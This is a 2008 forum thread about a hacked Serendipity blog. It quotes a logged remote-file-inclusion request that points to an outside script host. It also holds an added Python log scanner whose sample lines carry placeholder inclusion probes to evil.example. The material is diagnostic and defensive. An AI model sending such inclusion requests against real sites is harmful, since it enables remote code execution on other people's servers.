Possible execution of malicious code
Posted: Tue May 20, 2008 7:47 pm
by Shaun.Mitchell
My Serendipity blog was hacked today and my hosting provider is saying that it is a bug with Serendipity (don't all hosting providers blame the software and not their server?)
I'm not sure if this is possible but this is what they are saying was run:
GET /blog/index.php?/archives/24MCTSSQLServer2005.html27kfl209.85.165.104/cache:uRVO84x_ygMJ:www.verticalevolution.com/blog/index.php3F/archives/24MCTSSQLServer2005.html=http://www.dreamplay.com.br/PSD/x.txt?
This is the key: http://www.dreamplay.com.br/PSD/x.txt. Looking at this, it's a script that runs commands against the server and sends the results to an IRC channel.
Any thoughts on this from anyone? I'm hoping it's a server issue and not a serendipity issue.
Re: Possible execution of malicious code
Posted: Tue May 20, 2008 8:31 pm
by garvinhicking
Hi!
I tried to reproduce this, but using my own URLs this doesn't really work.
Actually, I don't think there's a place where Serendipity can include remote HTTP URLs as a PHP include command, so I don't see any vulnerability here.
I agree the URL looks like a hack, but to me it does not seem to do anything.
Instead of "http://www.dreamplay.com.br/PSD/x.txt" I created my own file: http://garv.in/test.txt -- if it had worked, on the vulnerable server a "/tmp/evil.txt" file would have been created, which is not the case.
Which serendipity version were you using? Was any other software running on your website, apart from Serendipity? It seems the URL is just a usual attack of remote software that tries to append its URL to see if remote code is executed.
What puzzles me is this "MCTSSQLServer2005" stuff. This seems to stem from a hack attack where people tried to exploit the vulnerability in the Microsoft SQL Server, which surely does not work with Serendipity.
Regards,
Garvin
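Garvin's test above checks from the attacker's side whether the appended URL is ever fetched and included; from the server's side, the same remote file inclusion probe is visible in the access log as a second URL embedded in the request target. The script below is an added example, not code from this thread or from Serendipity: it parses constructed Apache-style log lines (placeholder hosts and IPs) and flags requests that carry an embedded remote URL, including percent-encoded ones.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Apache combined format). The second line
# mirrors the shape of the request quoted in the thread; hosts are placeholders.
SAMPLE_LOG = """\
203.0.113.5 - - [20/May/2008:19:40:01 +0000] "GET /blog/index.php?/archives/24-post.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [20/May/2008:19:41:13 +0000] "GET /blog/index.php?/archives/24-post.html=http://evil.example/x.txt? HTTP/1.1" 200 5120 "-" "libwww-perl/5.805"
198.51.100.9 - - [20/May/2008:19:41:14 +0000] "GET /gallery/index.php?file=%68%74%74%70%3A%2F%2Fevil.example%2Fx.txt%3F HTTP/1.1" 200 880 "-" "libwww-perl/5.805"
203.0.113.7 - - [20/May/2008:19:42:00 +0000] "GET /blog/index.php?/archives/25-links.html HTTP/1.1" 200 4400 "http://example.org/ref" "Mozilla/5.0"
"""

# Only the quoted request line is inspected, so a Referer header containing a
# URL (last sample line) does not trigger a false positive.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# A URL with a remote scheme appearing inside the request target.
EMBEDDED_URL_RE = re.compile(r'(?:https?|ftps?)://[^\s"\'&]+', re.IGNORECASE)


def decode_target(target, rounds=2):
    """Percent-decode a request target, repeating to undo double encoding."""
    for _ in range(rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def find_rfi_probes(log_text):
    """Return (client_ip, decoded_target, embedded_url) for each suspicious line."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = decode_target(m.group("target"))
        # Search from index 1 so the request's own leading path is never the match.
        found = EMBEDDED_URL_RE.search(target, 1)
        if found:
            hits.append((line.split()[0], target, found.group(0)))
    return hits


if __name__ == "__main__":
    for ip, target, url in find_rfi_probes(SAMPLE_LOG):
        print(f"{ip} tried to pull in {url} via {target}")
```

A hit only shows that a remote URL was supplied, not that anything fetched it; whether the application actually includes it is what Garvin's /tmp/evil.txt check decides.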
Posted: Tue May 20, 2008 8:34 pm
by Shaun.Mitchell
Thanks for the quick reply. I was running version 1.2.1 but just finished upgrading. The SQLServer stuff was a blog post of mine with that title. I really didn't think that there was a case of them being able to run executable code in the URL but just wanted to make sure. I have the integration into the coppermine photo gallery on the site as well.
Thanks again.
Posted: Wed May 21, 2008 12:13 pm
by garvinhicking
Hi!
I believe Coppermine exploits have been around the last couple of days. This seems like a good suspect!
Regards,
Garvin
Posted: Wed May 21, 2008 3:57 pm
by judebert
Indeed, on the Coppermine home page they indicate an SQL injection vulnerability only a month old. If you had a version older than 1.4.18, it was vulnerable and needs to be upgraded.